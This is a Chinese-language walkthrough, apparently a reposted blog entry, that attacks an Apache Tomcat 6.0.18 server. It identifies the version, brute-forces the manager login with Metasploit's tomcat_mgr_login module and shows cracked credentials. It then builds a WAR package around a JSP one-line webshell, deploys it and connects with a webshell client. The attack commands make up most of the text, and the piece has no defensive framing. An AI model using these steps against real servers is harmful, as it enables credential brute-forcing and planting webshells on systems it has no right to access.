Pentest for kali-linux-Tomcat

A-1 信息收集

1.通过报错或者title判断目标的cms类型或是服务框架

Pentest for kali-linux-Tomcat_第1张图片 

u框架:Apache Tomcat

版本:6.0.18

2.亦或者通过kali下的nmap来识别


3.探测tomcat的管理后台

默认tomcat的管理后台在http://target/manager/html下或者点击tomcat测试页的Administration--

Tomcat Manager即可。

Pentest for kali-linux-Tomcat_第2张图片

可以看到tomcat进行了身份验证,进入tomcat管理后台口令的方法不止一种,首先我们可以通过暴力破解的方式来测试一下目标是否是弱口令,如果不是我们再用其他办法,比如是否可以利用已知漏洞绕过登录限制。


A-2利用metasploit进行暴力破解

说到这里我们在kali下有两款工具可以完成暴力破解的任务分别是burpsuite和metasploit.

但是这里就不多说burpsuite了,有兴趣的可以自行百度一下如何用burpsuite来进行暴力破解的。

在metasploit的辅助模块里已经集成了一个暴力破解tomcat后台的脚本tomcat_mgr_login.rb


启动metasploit

root@Leeboble:~# service postgresql start

root@Leeboble:~# service metasploit start

root@Leeboble:~# msfconsole

 

加载辅助模块

msf > search tomcat_mgr

msf > use auxiliary/scanner/http/tomcat_mgr_login

msf auxiliary(tomcat_mgr_login) > 

 

配置模块

msf auxiliary(tomcat_mgr_login) > show options 

用show options命令查看配置参数,由于该模块已经配置了用来暴力破解的user和password的字典因此不用再去配置了(如果有需要的话,可以向/usr/share/metasploit-framework/data/wordlists中的添加字段或者另外加载一份亦可)。接下来只需要配置远程主机IP、远程主机端口

msf auxiliary(tomcat_mgr_login) > set RHOSTS  xxx.xxx.xxx.xx

msf auxiliary(tomcat_mgr_login) > set RPORT 80

msf auxiliary(tomcat_mgr_login) > run

Pentest for kali-linux-Tomcat_第3张图片 

可见爆破成功,获取到tomcat的登录口令:xmapp:xmapp

A-3 通过tomcat管理后台getshell

1.制作war包

root@Leeboble:~/Desktop# mkdir testweb

root@Leeboble:~/Desktop# vim index.jsp 【这里写入jsp一句话】

root@Leeboble:~/Desktop# cp index.jsp testweb/

root@Leeboble:~/Desktop# cd testweb/

root@Leeboble:~/Desktop/testweb# jar -cvf ../testweb.war *


2.Getshell

上传部署war包


 

看如下图,已经成功部署了war包

 

 

访问webshell的地址

http://target/testweb/index.jsp出现500的错误

Pentest for kali-linux-Tomcat_第4张图片

这是正常现象,直接把链接用菜刀连接即可

Pentest for kali-linux-Tomcat_第5张图片

离线版文章:Pentest for kali-linux-Tomcat

 

你可能感兴趣的:(Pentest)